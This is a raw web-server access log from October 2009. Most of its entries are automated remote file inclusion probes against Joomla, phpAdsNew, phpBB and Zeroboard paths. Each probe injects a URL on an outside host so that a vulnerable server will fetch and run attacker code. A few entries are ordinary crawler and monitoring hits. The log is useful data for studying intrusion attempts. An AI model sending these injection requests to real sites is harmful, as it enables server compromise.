66.225.246.18 - - [12/Oct/2009:06:05:37 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
92.50.143.90 - - [12/Oct/2009:06:07:23 -0400] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.bijbelseonderwerpen.nl/mambo/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
92.50.143.90 - - [12/Oct/2009:06:07:23 -0400] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://www.bijbelseonderwerpen.nl/mambo/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
92.50.143.90 - - [12/Oct/2009:06:07:23 -0400] "GET /logs/access_log.Q109080800//phpAdsNew/view.inc.php?phpAds_path=http://www.bijbelseonderwerpen.nl/mambo/id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
92.50.143.90 - - [12/Oct/2009:06:07:41 -0400] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.bijbelseonderwerpen.nl/mambo/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
92.50.143.90 - - [12/Oct/2009:06:07:41 -0400] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://www.bijbelseonderwerpen.nl/mambo/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
92.50.143.90 - - [12/Oct/2009:06:07:41 -0400] "GET /logs/access_log.Q109080800%20%20//phpAdsNew/view.inc.php?phpAds_path=http://www.bijbelseonderwerpen.nl/mambo/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:08:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.205.103.171 - - [12/Oct/2009:06:09:44 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:09:44 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:09:44 -0400] "GET /logs/access_log.Q109071600%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:10:04 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:10:04 -0400] "GET /logs/access_log.Q109071600%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:10:04 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
95.135.66.164 - - [12/Oct/2009:06:10:25 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1)"
95.135.66.164 - - [12/Oct/2009:06:10:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1)"
95.135.66.164 - - [12/Oct/2009:06:10:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1)"
95.135.66.164 - - [12/Oct/2009:06:10:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1)"
211.206.120.162 - - [12/Oct/2009:06:10:56 -0400] "GET /logs/access_log.Q109070700//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.188.106.38 - - [12/Oct/2009:06:11:19 -0400] "GET //login.php?dir=http://www.leungting.com/components/com_banners/V4.8id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.188.106.38 - - [12/Oct/2009:06:11:19 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://www.leungting.com/components/com_banners/V4.8id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.188.106.38 - - [12/Oct/2009:06:11:19 -0400] "GET /logs//login.php?dir=http://www.leungting.com/components/com_banners/V4.8id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.188.106.38 - - [12/Oct/2009:06:11:27 -0400] "GET /logs/error_log.Q109061300%20%20//login.php?dir=http://www.leungting.com/components/com_banners/V4.8id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
119.63.199.57 - - [12/Oct/2009:06:11:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
85.128.60.100 - - [12/Oct/2009:06:12:45 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:06:12:45 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:06:12:45 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:13:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.205.103.171 - - [12/Oct/2009:06:13:56 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:13:56 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:13:56 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:13:56 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:14:04 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:14:04 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
204.15.230.189 - - [12/Oct/2009:06:15:06 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/log.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.40.68.132 - - [12/Oct/2009:06:15:19 -0400] "GET //?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:06:15:19 -0400] "GET /logs//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:06:15:22 -0400] "GET /logs/access_log.Q109081900//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.92.23.89 - - [12/Oct/2009:06:15:22 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.813"
212.92.23.89 - - [12/Oct/2009:06:15:22 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.813"
212.92.23.89 - - [12/Oct/2009:06:15:23 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.813"
212.92.23.89 - - [12/Oct/2009:06:15:45 -0400] "GET /logs/error_log.Q109062300//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.813"
81.176.226.170 - - [12/Oct/2009:06:15:47 -0400] "GET /logs/access_log.Q109090700//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.15.230.189 - - [12/Oct/2009:06:15:49 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
220.181.7.132 - - [12/Oct/2009:06:15:59 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.78 - - [12/Oct/2009:06:16:03 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.205.103.171 - - [12/Oct/2009:06:16:10 -0400] "GET /logs/access_log.Q109092000%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:16:10 -0400] "GET /logs/access_log.Q109092000%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/temp/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:16:12 -0400] "GET /logs/error_log.Q109072400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lighttown.net//copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:18:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.15.230.189 - - [12/Oct/2009:06:18:15 -0400] "GET /logs/access_log.Q109051100//index.php?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
204.15.230.189 - - [12/Oct/2009:06:18:15 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
204.15.230.189 - - [12/Oct/2009:06:18:15 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
200.219.245.149 - - [12/Oct/2009:06:18:32 -0400] "GET //?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:18:32 -0400] "GET /logs/access_log.Q109052500%20%20//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:18:32 -0400] "GET /logs//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
204.15.230.189 - - [12/Oct/2009:06:18:38 -0400] "GET /logs/error_log.Q109051100//index.php?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
61.129.64.174 - - [12/Oct/2009:06:18:47 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:18:48 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:18:48 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:18:51 -0400] "GET //?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:00 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:00 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:03 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:19:04 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:19:04 -0400] "GET /logs//?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:22 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:25 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:26 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:26 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:29 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:19:31 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:06:20:35 -0400] "GET //?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:06:20:35 -0400] "GET /logs//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:20:43 -0400] "GET //?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:20:43 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:20:43 -0400] "GET /logs//?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:21:07 -0400] "GET /logs/access_log.Q109052300%20%20//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:21:47 -0400] "GET /logs/access_log.Q109052500%20%20//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:21:47 -0400] "GET //?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:21:47 -0400] "GET /logs//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:22:51 -0400] "GET /logs/access_log.Q109081900//?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:23:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.172.225.50 - - [12/Oct/2009:06:23:31 -0400] "GET //?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:06:23:31 -0400] "GET /logs//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:06:23:35 -0400] "GET /logs/access_log.Q109081900//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Oct/2009:06:23:53 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:23:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:23:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.219.245.149 - - [12/Oct/2009:06:24:10 -0400] "GET /logs/access_log.Q109052300%20%20//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:06:24:21 -0400] "GET /logs/access_log.Q109090700//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:24:54 -0400] "GET /logs/access_log.Q109080500%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:25:06 -0400] "GET /logs/access_log.Q109080500%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:27:50 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:27:51 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:27:56 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:27:57 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:28:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.15.230.189 - - [12/Oct/2009:06:28:55 -0400] "GET /logs/access_log.Q109070700//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/log.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
204.15.230.189 - - [12/Oct/2009:06:28:55 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/log.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
81.12.13.152 - - [12/Oct/2009:06:29:19 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:29:19 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:29:19 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
204.15.230.189 - - [12/Oct/2009:06:29:31 -0400] "GET /logs/access_log.Q109091700//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/log.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
81.12.13.152 - - [12/Oct/2009:06:29:55 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:06:31:27 -0400] "GET /logs/access_log.Q109071000 HTTP/1.0" 200 3921078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.172.225.50 - - [12/Oct/2009:06:31:53 -0400] "GET //?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:06:31:53 -0400] "GET /logs//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
211.206.120.162 - - [12/Oct/2009:06:32:05 -0400] "GET //modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.206.120.162 - - [12/Oct/2009:06:32:05 -0400] "GET /logs//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.206.120.162 - - [12/Oct/2009:06:32:07 -0400] "GET /logs/access_log.Q109072400%20%20//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Oct/2009:06:32:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:32:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:32:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
193.4.113.98 - - [12/Oct/2009:06:32:10 -0400] "GET /logs/access_log.Q109080200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:32:13 -0400] "GET /logs/access_log.Q109080200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.206.120.162 - - [12/Oct/2009:06:32:38 -0400] "GET /logs/access_log.Q109070700%20%20//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:06:32:44 -0400] "GET /logs/access_log.Q109081900//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:32:48 -0400] "GET /logs/access_log.Q109090700//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:32:49 -0400] "GET /logs/access_log.Q109090700//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:33:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.129.64.174 - - [12/Oct/2009:06:33:08 -0400] "GET /logs/access_log.Q109090700//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:06:33:26 -0400] "GET /logs/access_log.Q109090700//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:34:18 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:34:18 -0400] "GET //?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:06:34:18 -0400] "GET /logs//?_zb_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:34:31 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:34:31 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:34:31 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21525 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:34:31 -0400] "GET /logs/access_log.Q109071600//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:34:40 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
